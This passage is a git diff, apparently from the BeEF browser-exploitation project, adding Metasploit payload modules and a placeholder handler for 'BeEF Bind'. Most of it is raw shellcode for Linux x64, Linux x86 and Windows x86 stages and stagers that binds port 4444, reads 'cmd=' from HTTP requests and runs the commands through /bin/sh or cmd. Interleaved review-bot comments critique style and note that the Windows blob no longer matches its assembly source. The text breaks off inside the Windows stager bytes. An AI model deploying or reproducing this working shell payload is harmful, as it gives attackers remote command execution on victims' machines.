+ def self.handler_type
+ return "beef_bind"
+ end
+
+ #
+ # Returns the connection oriented general handler type
+ #
+ def self.general_handler_type
+ "bind"
+ end
+
+ #
+ # Initializes a bind handler and adds the options common to all bind
+ # payloads, such as local port.
+ #
+ def initialize(info = {})
+ super
+ register_options(
+ [
+ Opt::LPORT(4444),
+ #OptAddress.new('RHOST', [false, 'The target address', '']),
+ ], Msf::Handler::BeEFBind)
+ end
+
+ #
+ # Placeholder only
+ #
+ def cleanup_handler
+ end
+
+ #
+ # Placeholder only
+ #
+ def add_handler(opts={})
+ # Start a new handler
+ start_handler
+ end
+
+ #
+ # Placeholder only
+ #
+ def start_handler
+ end
+
+ #
+ # Placeholder only
+ #
+ def stop_handler
+ end
+
+end
+
+end
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
new file mode 100644
index 000000000..99079e92f
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
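Review bot: `start_handler`, `stop_handler` and `cleanup_handler` are empty, so a payload declared with `'Convention' => 'beef_bind'` never gets a listener or a session from the framework, and `add_handler` does nothing beyond calling the empty `start_handler`; the module comment `This module implements the Bind TCP handler placeholder only.` should say that explicitly, presumably noting that interaction happens through the stage's own HTTP interface rather than through Metasploit. `handler_type` uses an explicit `return "beef_bind"` while `general_handler_type` relies on the implicit return; pick one style. The commented-out `#OptAddress.new('RHOST', ...)` line should be removed or become a TODO stating why RHOST is not registered. The `$Id: ... $` line at the top is a keyword-expansion leftover that will never be updated in this repository.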
@@ -0,0 +1,85 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => [ 'Bart Leppens' ], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X64, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [ 165, 'n' ] + }, + 'Payload' => + "\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" + + "\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" + + "\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" + + "\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" + + "\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" + + "\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" + + "\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" + + "\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" + + "\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" + + "\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" + + "\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" + + "\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" + + "\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" + + "\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" + + 
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" + + "\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" + + "\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" + + "\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" + + "\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" + + "\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" + + "\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" + + "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" + + "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" + + "\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" + + "\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" + + "\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" + + "\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" + + "\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" + + "\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" + + "\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" + + "\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" + + "\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" + + "\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" + + "\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" + + "\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" + + "\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" + + "\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" + + "\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" + + "\xf6\x48\x31\xd2\x0f\x05" + } + )) + end + + # Stage encoding is safe for this payload + def encode_stage? + true + end +end + 
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb
new file mode 100644
index 000000000..bbb9e715f
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb
@@ -0,0 +1,84 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => [ 'Bart Leppens' ], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [ 168, 'n' ] + }, + 'Payload' => + "\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" + + "\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" + + "\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" + + "\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" + + "\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" + + "\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" + + "\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" + + "\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" + + "\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" + + "\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" + + "\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" + + "\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" + + "\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" + + "\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" + + 
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" + + "\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" + + "\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" + + "\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" + + "\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" + + "\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" + + "\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" + + "\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" + + "\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" + + "\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" + + "\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" + + "\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" + + "\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" + + "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" + + "\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" + + "\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" + + "\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" + + "\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" + + "\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" + + "\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" + + "\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" + + "\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" + + "\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" + + "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80" + } + )) + end + + # Stage encoding is safe for this payload + def encode_stage? + true + end +end + 
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb
new file mode 100644
index 000000000..c9dc7767d
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb
@@ -0,0 +1,137 @@ +## +# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$ +## + + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Windows + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Windows Command Shell Stage (stager)', + 'Version' => '$Revision: 11421 $', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => [ 'Ty Miller' ], + 'License' => BSD_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Session' => Msf::Sessions::CommandShellWindows, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [ 511, 'n' ] + }, + 'Payload' => + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" + + "\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" + + "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" + + "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" + + "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" + + "\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" + + "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" + + "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" + + "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" + + "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" + + + "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" + + "\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" + + "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" + + "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" + + "\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" + + "\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" + + "\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" + + "\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" + + 
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" + + "\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" + + + "\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" + + "\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" + + "\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" + + "\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" + + "\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" + + "\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" + + "\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" + + "\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" + + "\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" + + "\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" + + + "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" + + "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" + + "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" + + "\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" + + "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" + + "\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" + + "\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" + + "\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" + + "\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" + + "\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" + + + "\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" + + "\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" + + "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" + + "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" + + "\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" + + "\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" + + "\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" + + "\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" + + "\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" + + "\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" + + + "\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" + + "\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" + + "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" + + "\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" + + "\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" + + "\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" + + "\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" + + "\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" + + "\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" + + "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" + + + 
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" + + "\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" + + "\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" + + "\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" + + "\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" + + "\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" + + "\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" + + "\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" + + "\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" + + "\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" + + + "\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" + + "\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" + + "\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" + + "\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" + + "\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" + + "\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" + + "\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" + + "\xff\xd5\xe9\x58\xfe\xff\xff" + } + )) + end + + # Stage encoding is safe for this payload + def encode_stage? + true + end +end + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb new file mode 100644 index 000000000..4ef9a5b10 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb 
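Review bot: The shipped `'Payload'` bytes cannot be reproduced from the assembly committed alongside them: the embedded HTTP header carries `Content-Length: 3048` (the `\x33\x30\x34\x38` run in the blob), while `windows/src/block_beef_bind-stage.asm` in this same commit emits `Content-Length: 3016`, so the binary and its source have already diverged. A provenance comment above the first string line naming the source file, the assembler/build command and the byte length — as the Windows stager module already does with `# Length: 299 bytes` — would let a reviewer regenerate the blob and diff it. The module's `'Name'` also reads `'BeEF Bind Windows Command Shell Stage (stager)'` for what is a stage, and `'Version' => '$Revision: 11421 $'` is a stale SVN keyword that no longer expands in git.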
@@ -0,0 +1,49 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+ include Msf::Payload::Stager
+ include Msf::Payload::Linux
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'BeEF Bind HTTP Stager',
+ 'Description' => 'Proxy web requests between a web browser and a shell',
+ 'Author' => ['Bart Leppens'],
+ 'License' => BSD_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X64,
+ 'Handler' => Msf::Handler::BeEFBind,
+ 'Convention' => 'beef_bind',
+ 'Stager' =>
+ {
+ 'RequiresMidstager' => false,
+ 'Offsets' => { 'LPORT' => [ 54, 'n' ] },
+ 'Payload' =>
+ "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" +
+ "\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" +
+ "\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" +
+ "\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" +
+ "\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" +
+ "\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" +
+ "\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" +
+ "\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" +
+ "\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" +
+ "\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" +
+ "\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" +
+ "\x01\xc6\xff\xe6"
+ }
+ ))
+ end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb
new file mode 100644
index 000000000..7174e7498
--- /dev/null
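Review bot: The `'Payload'` blob carries neither a byte-length comment nor a reference to the `.nasm` source it was assembled from, whereas the Windows stager module in this commit documents `# Length: 299 bytes` above its bytes; the Linux x86 stager in the next hunk has the same gap. A single line above the first string, e.g. `# Length: <N> bytes — assembled from <source .nasm file>`, would make each blob auditable against the source tree without disassembling it.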
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb
@@ -0,0 +1,47 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+ include Msf::Payload::Stager
+ include Msf::Payload::Linux
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'BeEF Bind HTTP Stager',
+ 'Description' => 'Proxy web requests between a web browser and a shell',
+ 'Author' => ['Bart Leppens'],
+ 'License' => BSD_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ 'Handler' => Msf::Handler::BeEFBind,
+ 'Convention' => 'beef_bind',
+ 'Stager' =>
+ {
+ 'RequiresMidstager' => false,
+ 'Offsets' => { 'LPORT' => [ 47, 'n' ] },
+ 'Payload' =>
+ "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" +
+ "\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" +
+ "\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" +
+ "\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" +
+ "\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" +
+ "\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" +
+ "\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" +
+ "\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" +
+ "\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" +
+ "\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
+ }
+ ))
+ end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb
new file mode 100644
index 000000000..a8ae2da82
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb 
@@ -0,0 +1,62 @@
+##
+# $Id: beef_bind-stager.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+ include Msf::Payload::Stager
+ include Msf::Payload::Windows
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'BeEF Bind HTTP Stager',
+ 'Version' => '$Revision: 9179 $',
+ 'Description' => 'Proxy web requests between a web browser and a shell',
+ 'Author' => ['Ty Miller'],
+ 'License' => BSD_LICENSE,
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ 'Handler' => Msf::Handler::BeEFBind,
+ 'Convention' => 'beef_bind',
+ 'Stager' =>
+ {
+ 'RequiresMidstager' => false,
+ 'Offsets' => { 'LPORT' => [ 200, 'n' ] },
+ 'Payload' =>
+ # Length: 299 bytes
+ "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
+ "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
+ "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
+ "\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
+ "\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
+ "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
+ "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
+ "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
+ "\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
+ "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
+ "\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
+ "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
+ "\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
+ "\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
+ "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" +
+ "\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" +
